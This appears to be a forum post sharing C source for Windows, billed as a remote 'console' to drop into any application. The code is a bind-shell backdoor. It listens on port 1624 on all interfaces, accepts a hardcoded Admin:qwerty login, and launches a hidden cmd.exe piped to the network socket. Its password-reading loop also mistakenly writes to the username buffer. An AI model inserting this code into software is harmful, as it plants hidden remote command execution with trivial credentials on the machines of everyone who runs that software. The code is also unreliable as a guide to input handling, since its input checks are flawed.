1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
| ////////////////////////////////////////////////////////////////////////////////////
//
// How to Add this console to your App
//
// 1. Add this file to your project
// 2. Define int InitConsole(); in your.cpp
// 3. Call InitConsole() from main() or other func
// 4. Run your.cpp and try telnet you_app_ip SHELL_PORT
// 5. Use u/p: Admin:qwerty
////////////////////////////////////////////////////////////////////////////////////
#define WIN32_LEAN_AND_MEAN
#include <stdio.h>
#include <windows.h>
#include <winsock2.h>
int InitConsole();
DWORD WINAPI Session (LPVOID lpParameter);
DWORD WINAPI Service (LPVOID lpParameter);
DWORD WINAPI EndSess (LPVOID lpParameter);
bool login(SOCKET& sendrecv);
#define SHELL_PORT 1624
#define SHELL_NAME "cmd\0"
bool login(SOCKET& sendrecv)
{
int nReceived, i;
char uname[16], pwd[16 ];
memset(( void *) &uname, 0, sizeof (uname));
memset(( void *) &pwd , 0, sizeof (pwd));
send(sendrecv, "\r\nUsername: ", sizeof("\r\nUsername: "), 0 );
for (i=0;i<16 ;i++)
{
nReceived = recv(sendrecv,&uname[i], 1,0 );
if (SOCKET_ERROR == nReceived) return false ;
if(uname[i] == 0x0d) uname[i] = 0x00 ;
if(uname[i] == 0x0a) { uname[i] = 0x00; break ; }
}
send(sendrecv, "Password: ", sizeof("Password: "), 0 );
for (i=0;i<16 ;i++)
{
nReceived = recv(sendrecv,&pwd[i], 1,0 );
if (SOCKET_ERROR == nReceived) return false ;
if(pwd[i] == 0x0d) pwd[i] = 0x00 ;
if(pwd[i] == 0x0a) { uname[i] = 0x00; break ; }
}
if (!strcmp(uname,"Admin") && !strcmp(pwd,"qwerty") ) return true ;
return false ;
}
DWORD WINAPI EndSess(LPVOID sr)
{
SOCKET sendrecv = *((SOCKET*)sr);
Sleep( 7500 );
closesocket(sendrecv);
return 0 ;
}
DWORD WINAPI Session(LPVOID sr)
{
SOCKET sendrecv = *((SOCKET*)sr);
if (login(sendrecv))
{
STARTUPINFO si;
SECURITY_ATTRIBUTES sa;
PROCESS_INFORMATION pi;
sa.nLength = sizeof (SECURITY_ATTRIBUTES);
sa.bInheritHandle = TRUE;
sa.lpSecurityDescriptor = NULL;
memset(( void *) &si, 0, sizeof (si));
memset(( void *) &pi, 0, sizeof (pi));
si.cb = sizeof (si);
si.dwFlags = STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
si.hStdInput = ( void *)sendrecv;
si.hStdOutput = ( void *)sendrecv;
si.hStdError = ( void *)sendrecv;
CreateProcess(NULL, SHELL_NAME, NULL, NULL, TRUE, 0 , NULL, NULL, &si, &pi);
}
return 0 ;
};
DWORD WINAPI Service(LPVOID lpParameter)
{
HANDLE evnt = *((HANDLE*)lpParameter);
SOCKET sock;
struct sockaddr_in sock_addr,sendrecv_addr;
WSADATA data;
WORD p;
p = MAKEWORD( 2,0 );
WSAStartup(p,&data);
sock = WSASocket (AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
sock_addr.sin_family = PF_INET;
sock_addr.sin_port = htons(SHELL_PORT);
sock_addr.sin_addr.s_addr = INADDR_ANY;
bind(sock,( struct sockaddr*)&sock_addr,sizeof(struct sockaddr_in));
listen(sock, 10 );
int lun = sizeof (struct sockaddr);
while(true )
{
SOCKET sendrecv = accept(sock,( struct sockaddr*) &sendrecv_addr, &lun);
DWORD dwThread;
CreateThread(NULL, 0, Session, &sendrecv, 0 , &dwThread);
CreateThread(NULL, 0, EndSess, &sendrecv, 0 , &dwThread);
}
closesocket(sock);
WSACleanup();
return 0 ;
}
int InitConsole()
{
HANDLE hevt = CreateEvent(NULL, FALSE, FALSE, TEXT( "console_already_inited" ));
if (GetLastError() != ERROR_ALREADY_EXISTS)
{
DWORD dwThread;
CreateThread(NULL, 0,Service,&hevt,0 ,&dwThread);
}
else return -1 ;
return 0 ;
} |
Integrer ce code
Répondre avec citation
Partager